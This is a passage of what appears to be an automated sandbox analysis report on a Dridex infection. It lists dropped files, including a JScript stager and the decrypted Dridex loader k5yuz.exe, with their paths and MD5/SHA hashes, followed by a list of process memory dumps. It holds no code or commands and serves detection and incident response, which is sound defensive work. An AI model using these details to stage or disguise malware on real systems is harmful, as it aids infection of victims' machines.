  SHA256: 4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
  SHA512: 67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
  MD5:    be4d72095faf84233ac17b94744f7084
  SHA1:   cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
  SHA256: b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
  SHA512: 43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5:    7a3e9ec84e21dabd54bf131473915585
  SHA1:   df6e0515511af43422c36434cf83693415dc94f9
  SHA256: 3c11f53d5d2dc3799de7b9e8f16e5c562b4af6c9492b39e6548ad5ab09e7315d
  SHA512: 5c1d469e43fe35b4064700b3f67da595461d2270d0183015b6b6c418897c16b1ad49064828a2d3e76f6975d80304c0bdd38c1aefb8a49ab647db66d37fa1d206

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ISB2KAC\N8Z6EVD0.htm
  MD5:    a4956484148dd65fd2567a49d3c27709
  SHA1:   63e9e87f3cac3efea17501199de10703e23cb5ee
  SHA256: 219bd1e316baa56f52da9c394f6abdff335f594d49f90e88aa99b8fa91a5be48
  SHA512: eaf2a49021a3c399b5503a03ee2bd8407def41b701b83ac05da7dbf163a2283342bb91da97ba2ba45267419204ad4058925aa266b3b8e40b7d1217d469544f45

C:\Users\Admin\AppData\Local\Temp\3.tMp (the echoed JScript stager; listed twice in the report with identical hashes)
  MD5:    88acae3e364010e82fb022c29ab69c9d
  SHA1:   043f08caaf36d317c60977dd9bdaa2be62ed54a0
  SHA256: f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
  SHA512: 38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

C:\Users\Admin\AppData\Local\Temp\k5yuz.exe (the decrypted Dridex loader; listed twice in the report with identical hashes)
  MD5:    3a44489e428c94ee9a96b81832b17f3c
  SHA1:   63b8fa8f63ef4f14e346d407823c88c235435866
  SHA256: 3f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b
  SHA512: 76abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WXER6JZL.txt
  MD5:    32189bd906b2deb4cd83b2842386d25c
  SHA1:   9196b2ea8c3735bee7520027a8ab5877d10c6035
  SHA256: bc760efd2699677dba9046f64bd7c3401aeb52b91272c27c8128c39c76ef6d3d
  SHA512: c75a10021eb13abfe09df5c2afc1b49ccd443e1ccacc1c17ca61208494493c55379873dbf91337a6f600288084e1a0880c4e86ccfa1e7b8e16714c5f1327683d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5:    cd245c6df282faf6fac7ffa10fa5a4a0
  SHA1:   e0d4649b9ed2c6a2b47560ea4ba4dc5fae8f7fc6
  SHA256: 5186338a9c581e2e7aca065baac64b490b15246e49ed4c4fbe030506bdaf9232
  SHA512: 89c8014496bdce53c6884b7945a025684024088a1a13b0216b49500f1485784ac3f789f86ff4b74fed296db00235287dd7990a6f914ac9b52b51145ad8c04b94

\Users\Admin\AppData\Local\Temp\k5yuz.exe (same file as above, recorded without the drive letter; listed twice in the report)
  MD5:    3a44489e428c94ee9a96b81832b17f3c
  SHA1:   63b8fa8f63ef4f14e346d407823c88c235435866
  SHA256: 3f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b
  SHA512: 76abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22
Memory dumps (file, filesize where the report gives one)
memory/676-60-0x0000000000000000-mapping.dmp
memory/892-2-0x000007FEFB931000-0x000007FEFB933000-memory.dmp (8KB)
memory/1108-53-0x0000000000000000-mapping.dmp
memory/1108-61-0x0000000002760000-0x0000000002764000-memory.dmp (16KB)
memory/1188-6-0x0000000074D91000-0x0000000074D93000-memory.dmp (8KB)
memory/1188-5-0x0000000000000000-mapping.dmp
memory/1188-22-0x0000000002832000-0x0000000002833000-memory.dmp (4KB)
memory/1188-20-0x0000000002830000-0x0000000002831000-memory.dmp (4KB)
memory/1188-9-0x0000000071490000-0x0000000071B7E000-memory.dmp (6.9MB)
memory/1312-11-0x0000000000000000-mapping.dmp
memory/1328-4-0x0000000000000000-mapping.dmp
memory/1492-7-0x0000000000000000-mapping.dmp
memory/1640-56-0x0000000000000000-mapping.dmp
memory/1640-68-0x0000000002590000-0x0000000002594000-memory.dmp (16KB)
memory/1656-71-0x0000000000400000-0x000000000043D000-memory.dmp (244KB)
memory/1656-70-0x00000000003A0000-0x00000000003DC000-memory.dmp (240KB)
memory/1656-65-0x0000000000000000-mapping.dmp
memory/1656-67-0x0000000000400000-0x000000000043D000-memory.dmp (244KB)
memory/1696-54-0x0000000000000000-mapping.dmp
memory/1868-15-0x0000000001FA0000-0x0000000001FA1000-memory.dmp (4KB)
memory/1868-25-0x0000000005400000-0x0000000005401000-memory.dmp (4KB)
memory/1868-43-0x00000000063F0000-0x00000000063F1000-memory.dmp (4KB)
memory/1868-36-0x0000000006290000-0x0000000006291000-memory.dmp (4KB)
memory/1868-35-0x000000007EF30000-0x000000007EF31000-memory.dmp (4KB)
memory/1868-34-0x0000000005880000-0x0000000005881000-memory.dmp (4KB)
memory/1868-29-0x0000000005750000-0x0000000005751000-memory.dmp (4KB)
memory/1868-10-0x0000000000000000-mapping.dmp
memory/1868-23-0x0000000002610000-0x0000000002611000-memory.dmp (4KB)
memory/1868-21-0x00000000028F2000-0x00000000028F3000-memory.dmp (4KB)
memory/1868-19-0x00000000028F0000-0x00000000028F1000-memory.dmp (4KB)
memory/1868-17-0x0000000004980000-0x0000000004981000-memory.dmp (4KB)
memory/1868-14-0x0000000071490000-0x0000000071B7E000-memory.dmp (6.9MB)
memory/1972-3-0x000007FEF7570000-0x000007FEF77EA000-memory.dmp (2.5MB)
memory/1992-51-0x0000000000000000-mapping.dmp